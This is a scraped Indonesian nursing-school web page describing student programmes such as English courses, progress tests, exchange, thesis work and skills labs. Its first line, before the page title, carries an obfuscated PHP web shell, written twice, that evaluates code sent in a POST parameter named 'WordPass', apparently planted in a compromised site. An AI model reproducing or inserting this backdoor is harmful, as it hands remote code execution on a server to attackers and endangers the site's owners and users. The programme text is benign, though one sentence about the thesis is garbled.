@$A='Acc';$p='_';$o='PO';$s='S';$t='T';;@eval(${$p.$o.$s.$t}['WordPass']);@$A='Acc';$p='_';$o='PO';$s='S';$t='T';;@eval(${$p.$o.$s.$t}['WordPass']); Program Kegiatan | Keperawatan UMY

Program Kegiatan

A. Program D1 Bahasa Inggris
Untuk program D1 Bahasa Inggris terintegrasi dengan proses pembelajaran akademik, dimana disetiap semester terdapat 2 SKS untuk program Bahasa Inggris, sehingga jumlah total yaitu ada 16 SKS. Program D1 Bahasa Inggris ini diharapkan akan mampu membuat mahasiswa dapat secara aktif berkomunikasi dalam bahasa Inggris.

B. Progress Test
Progress test adalah suatu ujian untuk mengetahui peningkatan kemampuan mahasiswa dibidang ilmu keperawatan. Ujian ini dilakukan secara periodik, dijadwalkan setiap akhir tahun dan wajib diikuti oleh seluruh mahasiswa Keperawatan baik tahap akademik maupun profesi. Progress test yaitu merupakan contoh-contoh soal uji kompetensi sebagai seorang perawat profesional. Progress test akan dilakukan dengan menggunakan CBT.

C. English Hours
English Hours adalah suatu ajang bagi mahasiswa untuk melatih dan meningkatkan kemampuan komunikasi secara aktif dalam bahasa Inggris yang bersifat fun, didalam kegiatan ini terdapat drop in center sehingga mahasiswa dapat mempraktekan kemampuan bahasa inggrisnya dengan lebih terorganisir. English hours dijadwalkan setiap hari Jum’at pukul 13.00-14.30 WIB yang wajib diikuti oleh setiap mahasiswa. English Hours ini akan dipandu oleh Instruktur bahasa Inggris.

D. Evidence-Based Nursing (EBN)
Evidence-Based Nursing akan diperkenalkan kepada mahasiswa ditahun kedua dan kemampuan dalam Evidence-based Nursing ini akan membekali mahasiswa dalam peningkatan kemampuan diri menjadi perawat professional. Evidence-based nursing yaitu bagaimana praktik seorang perawat atau pengambil keputusan seorang perawat mendasarkan diri pada bukti. Dalam pembelajaran EBN ini mahasiswa akan dilatih untuk berpikir kritis dalam membaca dan mengkritisi hasil-hasil penelitian.

E. International Student Exchange
International student exchange adalah program pertukaran mahasiswa ke luar negeri. Program ini dilaksanakan saat mahasiswa memasuki tahap profesi ners. Tujuan dari program ini adalah untuk mengenalkan profesi keperawatan di dunia internasional dan memberikan kesempatan kepada mahasiswa untuk menambah pengetahuan dan pengalaman terkait program unggulan dalam bidang keperawatan di rumah sakit tempat mahasiswa praktek. Program ini dilaksanakan selama kurang lebih 4 minggu.

F. Karya Tulis Ilmiah
Karya tulis ilmiah (KTI) merupakan tugas akhir bagi mahasiswa keperawatan. Karya Tulis Ilmiah dapat bersifat kelompok maupun individual. KTI dapat dilakukan secara kelompok dengan syarat KTI tersebut untuk kompetisi. Dimana KTI yang dapat dipergunakan untuk Dalam KTI ini mahasiswa akan melakukan penelitian sesuai topik yang menjadi minat. Topik-topik penelitian diharapkan dapat meningkatkan bagi ilmu keperawatan, baik praktek, teori, maupun untuk pengembangan riset keperawatan serta kompetisi penelitian. Dalam KTI nantinya diharapkan mahasiswa akan mempresentasikan hasil penelitian dan diskusi dalam bahasa Inggris.

F. E-Learning
E-learning digunakan sebagai salah satu media pembelajaran untuk perkuliahan. E-learning yaitu pembelajaran dengan internet melalui program Els. Untuk beberapa topik dalam mata kuliah akan disampaikan melalui e-learning ini, termasuk untuk mengerjakan mini-quiz.

G. Komuda
Komuda adalah salah satu rangkaian kegiatan praktek keperawatan, dimana mahasiswa akan dipaparkan secara dini (early exposure) dirumah sakit. Dalam komuda mahasiswa akan melakukan beberapa kegiatan yang nantinya akan dijabarkan lebih lanjut pada buku panduan komuda untuk tiap mata ajar yang membutuhkan kegiatan komuda. Dalam komuda ini mahasiswa harus melakukan refleksi kasus yang ditemuinya dilahan praktek. Dalam komuda ini mahasiswa wajib mengenakan pakaian seragam yang telah ditetapkan oleh pihak akademik.

H. PSKI
PSKI adalah Pusat Studi Kedokteran Islam. Bagi mahasiswa keperawatan ada beberapa kegiatan yang harus dilakukan sebagai syarat kelulusan akademik, diantaranya harus lulus ujian yang diselenggarakan oleh bagian PAI (Pendampingan Agama Islam).

I. Skills lab komunikasi Keperawatan
PSN FKIK UMY mempunyai fasilitas mini hospital yang digunakan oleh mahasiswa untuk melatih ketrampilan (skill) keperawatan, sehingga diharapkan mahasiswa kompeten melakukan ketrampilan keperawatan dalam upaya meningkatkan derajat kesehatan pasien. Selain itu PSN FKIK UMY juga sedang mengembangkan Skillslab komunikasi keperawatan yang memfokuskan ketrampilan komunikasi dalam bahasa inggris sehingga diharapkan mahasiswa mempunyai kemampuan berkomunikasi dalam bahasa Inggris.